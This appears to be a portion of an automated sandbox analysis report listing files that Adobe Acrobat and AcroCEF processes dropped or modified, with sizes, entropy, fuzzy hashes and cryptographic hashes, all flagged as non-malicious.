Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07938560143978302 |
Encrypted: | false |
SSDEEP: | 3:x/llKYeSwTgvew/fgsCrZClW/tA8hryll+SHY/Xl+/rQLve:blKzkewfgs3Gm8QAS4M |
MD5: | 34AD5CC5E62848D094D16FFB6F5C516D |
SHA1: | 608234EB93B5FDD1F0804121E2A5C2E91055814E |
SHA-256: | 16A4FC251BF938BFB8768110BCF798E59585A5AC8BC130869142000BECEB70E2 |
SHA-512: | A1CE883520F1B422333FDB3B4E42C852588703C5407346201A5FCEB0D4EEDC15F87272E09913762B4568688B02ACE3D89D2CE7B4C8D6DFFEFD50C1AC93CA759E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 290 |
Entropy (8bit): | 5.221900768069021 |
Encrypted: | false |
SSDEEP: | 6:iO4qUzN9+q2PqLTwi2nKuAl9OmbnIFUtSqUg2WZmwsqUg9VkwOqLTwi2nKuAl9Oe:7Y9+v8wZHAahFUtHJ/V9V5TwZHAaSJ |
MD5: | AE2E3842A7BE6883D7E1350B627344F9 |
SHA1: | 8FD3B150CB71DECC93994F616E4DD062862B04BE |
SHA-256: | 01889A36BB3F575EE851E07A3F5FAD997EF77B88B2F91AF7D3D10AE8178D620F |
SHA-512: | 73BCA0BB4F58AAB2ED244314C47994F9C580AE72D88B33C89E86D914B9FAE7E708D11D6AC878E30AD03AA176759858EF43E7F80235A50F686760105405AAA09F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 290 |
Entropy (8bit): | 5.221900768069021 |
Encrypted: | false |
SSDEEP: | 6:iO4qUzN9+q2PqLTwi2nKuAl9OmbnIFUtSqUg2WZmwsqUg9VkwOqLTwi2nKuAl9Oe:7Y9+v8wZHAahFUtHJ/V9V5TwZHAaSJ |
MD5: | AE2E3842A7BE6883D7E1350B627344F9 |
SHA1: | 8FD3B150CB71DECC93994F616E4DD062862B04BE |
SHA-256: | 01889A36BB3F575EE851E07A3F5FAD997EF77B88B2F91AF7D3D10AE8178D620F |
SHA-512: | 73BCA0BB4F58AAB2ED244314C47994F9C580AE72D88B33C89E86D914B9FAE7E708D11D6AC878E30AD03AA176759858EF43E7F80235A50F686760105405AAA09F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 334 |
Entropy (8bit): | 5.177280814078244 |
Encrypted: | false |
SSDEEP: | 6:iO4qWcH+q2PqLTwi2nKuAl9Ombzo2jMGIFUtSqWCIcZmwsqWCIcVkwOqLTwi2nK3:7QcH+v8wZHAa8uFUty2/MyV5TwZHAa8z |
MD5: | C0AE0C249AD1770C021324CD96347FE8 |
SHA1: | C218E4FDC6F0C94937C346434169550E5C5ACFE0 |
SHA-256: | 8278816E47A74AE5C7C18AC9B102785A288EA2316F82B051C5ED36F24CC2F186 |
SHA-512: | B7ABFD23FBCF3E6EED4CB67B9E7CD5636AA2B10C7AC778597BD0E07967E0B6E18542C740DED0EEE9E9650BBB5A00DA6D265F6BB1B83A2A46689B53631C01E5D2 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 334 |
Entropy (8bit): | 5.177280814078244 |
Encrypted: | false |
SSDEEP: | 6:iO4qWcH+q2PqLTwi2nKuAl9Ombzo2jMGIFUtSqWCIcZmwsqWCIcVkwOqLTwi2nK3:7QcH+v8wZHAa8uFUty2/MyV5TwZHAa8z |
MD5: | C0AE0C249AD1770C021324CD96347FE8 |
SHA1: | C218E4FDC6F0C94937C346434169550E5C5ACFE0 |
SHA-256: | 8278816E47A74AE5C7C18AC9B102785A288EA2316F82B051C5ED36F24CC2F186 |
SHA-512: | B7ABFD23FBCF3E6EED4CB67B9E7CD5636AA2B10C7AC778597BD0E07967E0B6E18542C740DED0EEE9E9650BBB5A00DA6D265F6BB1B83A2A46689B53631C01E5D2 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\41b36b27-ca74-47b6-ab0f-894136c2c4c2.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.968015424318641 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqEsBdOg2HlZcaq3QYiub5P7E4T3y:Y2sRdsMdMHK3QYhbt7nby |
MD5: | 7CC149E62683C4F97ECAD4B89D9EE795 |
SHA1: | 89E393AFA2C29F36846AAD14C454ABAB8929307E |
SHA-256: | 5F7D65AAF6B3C0142F80ABE026CECA078F4DA2253775E03683072D2A1A053C41 |
SHA-512: | 22467C69085F62042D7C751168668A76D1C606C54B3300CEF52DCB842D35570B101E1EE6A8ECA8AA25AC4FE7AB31AF691B5E5E4AE7DB203817583058655424D5 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.968015424318641 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqEsBdOg2HlZcaq3QYiub5P7E4T3y:Y2sRdsMdMHK3QYhbt7nby |
MD5: | 7CC149E62683C4F97ECAD4B89D9EE795 |
SHA1: | 89E393AFA2C29F36846AAD14C454ABAB8929307E |
SHA-256: | 5F7D65AAF6B3C0142F80ABE026CECA078F4DA2253775E03683072D2A1A053C41 |
SHA-512: | 22467C69085F62042D7C751168668A76D1C606C54B3300CEF52DCB842D35570B101E1EE6A8ECA8AA25AC4FE7AB31AF691B5E5E4AE7DB203817583058655424D5 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3878 |
Entropy (8bit): | 5.223101805715525 |
Encrypted: | false |
SSDEEP: | 96:GICD8SBCmPAi8j0/8qbGNSwPgGYPx8xRqhm068OzAJrQG:1CDLCmPj8j0/8qKgwPHYPx8xemT8OzAZ |
MD5: | 623CAB73D6B111A78EC1B04E8F3B4F9F |
SHA1: | 6EC2F3D005C1F4236BDE08BD74214A57669CF93A |
SHA-256: | ED8A5EC1435476CE9DD4DF1C3D58853C23120A4584779241C2EB0978ADF006A7 |
SHA-512: | 19DF5AF57E50FA88D88B31E428B6481D250BC19A1A60DAD8518C459BF0B9E0FBBDE0D4A26AFAA33851FE39E9A1F3F603ADF42C8D195802B36AED0F7E097D1A77 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 322 |
Entropy (8bit): | 5.139202968415729 |
Encrypted: | false |
SSDEEP: | 6:iO4q3T8SN+q2PqLTwi2nKuAl9OmbzNMxIFUtSq3yZZmwsqyyVkwOqLTwi2nKuAlG:7JQSN+v8wZHAa8jFUtbG/xV5TwZHAa8E |
MD5: | 56551D827707A00E8088AA75B9A6254E |
SHA1: | A3B87F3644ECA1B7E296E25C551546996873448B |
SHA-256: | 30818670F75C27F87F31A3870D2C6876F4D28EEA4881058C382923E6CA65ECD0 |
SHA-512: | D0CE38DFAB2A36C0BB8DB0D99D23E62F2F4E8C5CF317190403544C26AFD9954F05412811F1275C9698A6E43770B4519EC0C10AD3C670C3102F9DD897B25E89AF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 322 |
Entropy (8bit): | 5.139202968415729 |
Encrypted: | false |
SSDEEP: | 6:iO4q3T8SN+q2PqLTwi2nKuAl9OmbzNMxIFUtSq3yZZmwsqyyVkwOqLTwi2nKuAlG:7JQSN+v8wZHAa8jFUtbG/xV5TwZHAa8E |
MD5: | 56551D827707A00E8088AA75B9A6254E |
SHA1: | A3B87F3644ECA1B7E296E25C551546996873448B |
SHA-256: | 30818670F75C27F87F31A3870D2C6876F4D28EEA4881058C382923E6CA65ECD0 |
SHA-512: | D0CE38DFAB2A36C0BB8DB0D99D23E62F2F4E8C5CF317190403544C26AFD9954F05412811F1275C9698A6E43770B4519EC0C10AD3C670C3102F9DD897B25E89AF |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.438354373405886 |
Encrypted: | false |
SSDEEP: | 384:SeRci5GRiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:WdurVgazUpUTTGt |
MD5: | 7FA605486CBB7074E624342F40AB1588 |
SHA1: | 235F543D9C24E8E3BE37A9B5802BEEB11E9F291D |
SHA-256: | 4B06FCFBF9527E9451B721E943E5F8F6BF4C42109616D3934F8752A1024A1352 |
SHA-512: | FEBAF18E9431C139CE1A2A61AD54090A322C7461486FC6CE60C41DC0FA699CF9E18752C34413EA37A3D08AF9B74B2FFFDEF43E93AA31E699A3A844CAB00FE9C4 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.210893623912878 |
Encrypted: | false |
SSDEEP: | 24:7+tEB36wKR7qLLzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf92:7MeWFqPmFTIF3XmHjBoGGR+jMz+LhQ |
MD5: | D3E390E50455FDD4851926D466EF99BB |
SHA1: | DAFA67DBD3FB33AA7618E1AF9B2302CD9FF0AD80 |
SHA-256: | EC43DBA237914BBBC9E7B999D5856A7A55E9BDEBA36F4B26E96C83CF00F2426C |
SHA-512: | 2A713C479ED4996655096B67510DCACFDCE445121425B2295F118CAA8A0B9A39E81D1099DA6CA59A511E708A9EF59228535E6FC5EC84EC9532253C5547E93376 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7386214950254377 |
Encrypted: | false |
SSDEEP: | 3:kkFklKwS/tfllXlE/HT8kyzlXNNX8RolJuRdxLlGB9lQRYwpDdt:kKT1/eT8n7NMa8RdWBwRd |
MD5: | 45DB6934C2E1C6064A75435195478BDD |
SHA1: | E513E9C3BAC199948972A4AB298793932677DE0F |
SHA-256: | 270199FC2003F7482E582014F9823DE365E1D8A071C21C0DBFFA0DACB18BCD29 |
SHA-512: | D59F2665D1DE96326ACFA6577A6558EAD280C2D85183C3258C5B2A983815B495A153C4604F4B647BD6568CBC986AD377316BFAC9F19837A2AEC27C3888272FFE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.236892865807448 |
Encrypted: | false |
SSDEEP: | 6:kKf0L9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:kiDImsLNkPlE99SNxAhUe/3 |
MD5: | F0E449A9B90214982D7BEF383BE5FBD2 |
SHA1: | 511110297E63F039BFCF3D8BA18529029DC62B31 |
SHA-256: | DCC6267B3F9FE34BB746401AA98BA7DA5D2FD746E75FE3150268C967CE15A70F |
SHA-512: | 7D146E2E765383A3CEBE03F015DA3779EFE59AF4049227546567C211B69713540E03ABF2F2F6919ED073312F82482E67E2D5D4819305631ABC98C8421AC09AD8 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.363166481845212 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXXKnEJWO4mSg1c2LjcWkHvR0YyuoAvJM3g98kUwPeUkwRe9:YvXKXSQrT5LjIPWFGMbLUkee9 |
MD5: | 07C84F7AF92E379FE7901FDABA397642 |
SHA1: | 03B12BF5269629E3EECE74D2CFFD2E783C6FFD9B |
SHA-256: | AA6284F78C78AFBFD9426B31AB063AB1060D242FCB381A8877B7FDA85ECA901B |
SHA-512: | 1D3116BEA262816CF30D6E79C8C2D1D37D35FADD0A2605A22F415B68DD94F6F980EFFB7665485117216454084A633CC9535B67BE3AA1B5D519B5CEF1D7E750A3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.316232240591542 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXXKnEJWO4mSg1c2LjcWkHvR0YyuoAvJfBoTfXpnrPeUkwRe9:YvXKXSQrT5LjIPWFGWTfXcUkee9 |
MD5: | 411C12B0587DBC05AE44D8C047237DFA |
SHA1: | 828B2ECAC959CAAE02D8297F390FCB84837A39C3 |
SHA-256: | A4DE9F28837B4A3DD51A5CB0CF018BC2E681B52DF3573B670D435FF6ADCBF000 |
SHA-512: | A7FEE0B0EB0C740E1DCC2092D63D2AEDD4CDB55516616F80B0C8A77BD0C5761F266C57E73511AC5BF253ABF892DE89D1892E6E0E03CD67E9E443B5421DE6D828 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.295227275986617 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXXKnEJWO4mSg1c2LjcWkHvR0YyuoAvJfBD2G6UpnrPeUkwRe9:YvXKXSQrT5LjIPWFGR22cUkee9 |
MD5: | 479D2088F84317881F2F8B94CE081092 |
SHA1: | 98818496A171D574FE3895241FE8395CE72F69AF |
SHA-256: | 81BFF832A6D98FD01B82170761A924486C2D62FC26D0298B84C6CCDF37E7A345 |
SHA-512: | 072BE69ABAC37590DA01BC3FB7C9400F5980C36CD36F69F3060219C8DB78D66A847F3F51868CB0405F38AF254233F21B540EF470151DB9F4DDFBB1C283B21CA7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.344161605475112 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXXKnEJWO4mSg1c2LjcWkHvR0YyuoAvJfPmwrPeUkwRe9:YvXKXSQrT5LjIPWFGH56Ukee9 |
MD5: | B4AE03886108DB9400F295565D5C24C4 |
SHA1: | 52042B967AFFF7793FB884D4E356EC967012DEAC |
SHA-256: | 4C7D5E61FD74B016186DF877D9634E8F32C727458B3389A3C4475686A935BD43 |
SHA-512: | 6FD103388C7B37584666664BE29F81FFA67764A7DB3A2AAB2A148D9CEC577409C2AA88F68EF93346808FDC85CF245DC2CEBCEE81D11282001FABAC19D00254F2 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.694600023749096 |
Encrypted: | false |
SSDEEP: | 24:Yv6XSgT5XI9pLgE9cQx8LennAvzBvkn0RCmK8czOCCSb:YvlEX8hgy6SAFv5Ah8cv/b |
MD5: | 127B823C3DF1B99395888F882337FB91 |
SHA1: | C3A3ADAFF2559FD57D9E7CD7CB8AB079993FB530 |
SHA-256: | AD61C92E5EC7D496F1D9A307FE384870C8E0509C41C72C601363E07F4FA49FA3 |
SHA-512: | EE396A7068FFF27EC768A0ECD58CAE48CBD84C3116D64EA50BA320370C34AE626BAD8D9ABE050C656319DFDB8397F065A0ABFF63ACAE1E991DF1B973D58C1BFA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.3168115206663344 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXXKnEJWO4mSg1c2LjcWkHvR0YyuoAvJf8dPeUkwRe9:YvXKXSQrT5LjIPWFGU8Ukee9 |
MD5: | B5BE0596CA4CB376DE1F8AB8BA119881 |
SHA1: | BB764F6DEA08BC09DF97927A90E185B1BBAE1CAD |
SHA-256: | E4225C0D530FF069A90FC2418F46BFBCE83F7752EB7975B634509B0E9539F276 |
SHA-512: | A8765E297BD062E85671B6EEA2CB19F0B6A478E57E40104FE9BCDC36E13AC52648BB750CE13F58C9005F5BA01048143CCFEB5693EA13A95F7D398C8394EB0199 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.308177652741234 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXXKnEJWO4mSg1c2LjcWkHvR0YyuoAvJfQ1rPeUkwRe9:YvXKXSQrT5LjIPWFGY16Ukee9 |
MD5: | E6D0C8FC5E14CBA3C9705D9FF7FC2ED3 |
SHA1: | 1DA02FEDC201217B6D213844D04C3EA4BE7F4B61 |
SHA-256: | EB772CF618CCF19CAC12F1D143A1833C36F82F5CF41AA866414A8B73DAD7CA89 |
SHA-512: | C009820F79068E5AADF8770A5913538758EE16DD464F4D6D7EB3489C3933566EA60F485909206C8B29F1879BFA125ECA2F38E349BF334A0EA39743D0604BDC6D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.3255490947130895 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXXKnEJWO4mSg1c2LjcWkHvR0YyuoAvJfFldPeUkwRe9:YvXKXSQrT5LjIPWFGz8Ukee9 |
MD5: | 6F4ADBA752D08664A382458349A20017 |
SHA1: | 6DF9E5690A5B6297BB4B0B5D6E71EDAA187FE15B |
SHA-256: | 6912DD89AE6975BA1AC4188FF010A0795DAC2AAAFB9F10CCEB4BA9C4E9590A99 |
SHA-512: | 735BA879227BDA3B66B5290CB58BDDF06930A193489AB692CF276FF0DB88DF9CCB65CF17C3F0223C83DC92E9467F88F823DC26606ECE853388F78BFBEBFDEDE1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.342111779173475 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXXKnEJWO4mSg1c2LjcWkHvR0YyuoAvJfzdPeUkwRe9:YvXKXSQrT5LjIPWFGb8Ukee9 |
MD5: | 34DA92F56D8CC16399FBB51FCE92CA6F |
SHA1: | E3274B0464320E904C4B239EAC0D706608DD45DA |
SHA-256: | 96FAD3662F6697BB2B1C130C1FECD018A8717CE3FA4068F024A6BF409751FE0C |
SHA-512: | D94550F3461E31E967DE0C02360D6F70ADECF6CB807DF05DFC5AFD21D405C7F07F610FE8B572D19946D7EA502EF3602ACD1F32ED56059754C2B6867E09498239 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.32322780204934 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXXKnEJWO4mSg1c2LjcWkHvR0YyuoAvJfYdPeUkwRe9:YvXKXSQrT5LjIPWFGg8Ukee9 |
MD5: | 0D40552150F65CD7D4A14A63063A5554 |
SHA1: | A7F3D0CD0FC20A908FAD825BF25A4C4034687B52 |
SHA-256: | 69A1ADC01D82338C3CA6E4A8A34795839C469AC507E258652393EF9C076AEF7E |
SHA-512: | 7C2E23749CEA52C048997D9A148A020A97B691C7479535130C9D5981E2FF7B949F8748F60EAA2FA8E77F58686585CEF3D4A251557AB3C874E9E4D07683DF41D9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.30998610597678 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXXKnEJWO4mSg1c2LjcWkHvR0YyuoAvJf+dPeUkwRe9:YvXKXSQrT5LjIPWFG28Ukee9 |
MD5: | F5FF26D9AF2F0E79B004C5A32178AB7B |
SHA1: | C5D2C88B57339CE93EF7B584CE3AA3DCDE81A134 |
SHA-256: | 393EA414B865E928FC266921D8AC2C40F433A37D43CAC3F51FE6B1904E30C36A |
